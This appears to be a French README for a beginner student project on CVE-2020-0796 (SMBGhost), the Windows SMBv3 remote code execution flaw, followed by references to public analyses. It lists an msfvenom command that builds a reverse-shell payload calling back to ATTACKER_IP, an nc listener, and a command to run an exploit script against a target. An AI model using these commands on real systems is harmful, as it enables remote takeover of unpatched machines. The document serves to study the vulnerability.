CVE-2020-0796
Explication de CVE-2020-0796 et recherche de la vulnérabilité pour le projet de semestre CENG325 pour débutants
Génération de payload utilisateur pour reverse shell :
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=5555 -f python
port d'écoute :
nc -lvnp 5555
exécution de l'exploit :
python3 exploit.py -ip TARGET_IP
Dépôts PoC
Références
- CVE-2020-0796 : Vulnérabilité d'exécution de code à distance « wormable » dans Microsoft SMB. (13 mars 2020). Tenable®. https://www.tenable.com/blog/cve-2020-0796-wormable-remote-code-execution-vulnerability-in-microsoft-server-message-block
- « I’ll ask your body » : RCE pré-authentification SMBGhost abusant des structures DMA. (20 avril 2020). Ricercasecurtiy.Blogspot.https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html
- CVE-2020-0796 Vulnérabilité de corruption mémoire dans le serveur SMB de Windows 10 | FortiGuard Labs. (12 mars 2020). Fortinet Blog. https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server
- Team, K. (2 avril 2020). Analyse du PoC d'exploit LPE Windows SMBv3 CVE-2020-0796. Medium.https://medium.com/@knownsec404team/cve-2020-0796-windows-smbv3-lpe-exploit-poc-analysis-c77569124c87
- CVE-2020-0796 –. (2020). Cyber Threat Insider Blog.https://blog.sensecy.com/tag/cve-2020-0796/
Membres du projet